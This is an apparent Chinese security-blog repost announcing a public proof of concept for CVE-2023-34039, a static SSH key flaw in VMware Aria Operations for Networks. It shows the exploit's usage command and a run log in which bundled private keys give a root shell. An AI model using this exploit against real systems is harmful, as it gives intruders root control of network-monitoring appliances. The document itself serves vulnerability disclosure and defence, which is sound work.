VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)
2023-9-2 12:44:52 Author: Ots安全(查看原文) 阅读量:53 收藏

POC来源于Github请在虚拟环境中,进行使用。

CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) 的 POC 静态 SSH 密钥 RCE

技术分析

该漏洞的根本原因分析可以在我的博客上找到:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

概括

VMWare Aria Operations for Networks (vRealize Network Insight) 从版本 6.0 到 6.10 不会为 和support用户重新生成 ssh 密钥ubuntu,从而允许具有 SSH 访问权限的攻击者获得root对此产品的 shell 访问权限。

ProjectDiscovery Research的Harsh Jaiswal (@rootxharsh) 和Rahul Maini (@iamnoooob)向 VMWare 报告了此问题

我刚刚编写了这个漏洞利用程序(如果你可以这样称呼它的话),因为它基本上是一个 ssh 命令包装器。

用法

python CVE-2023-34039.py --target 192.168.1.16(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform

********************************** ATTENTION ********************************** NTP Service is not healthy. IMPACT: It may affect the proper working of other services. ACTION: Restore the service using 'ntp' CLI command.********************************** ATTENTION **********************************[email protected]:~$ sudo -i[email protected]:~# iduid=0(root) gid=0(root) groups=0(root)[email protected]:~# hostnamevrni-platform-release[email protected]:~#

项目地址:

https://github.com/sinsinology/CVE-2023-34039

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247501220&idx=2&sn=f95e3a160501b0fed02d97ba40d97ce0&chksm=9bad8cefacda05f96ce4fed4e866af090c9007e0906744d5fbe38749f6490638a56398b8d4da&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh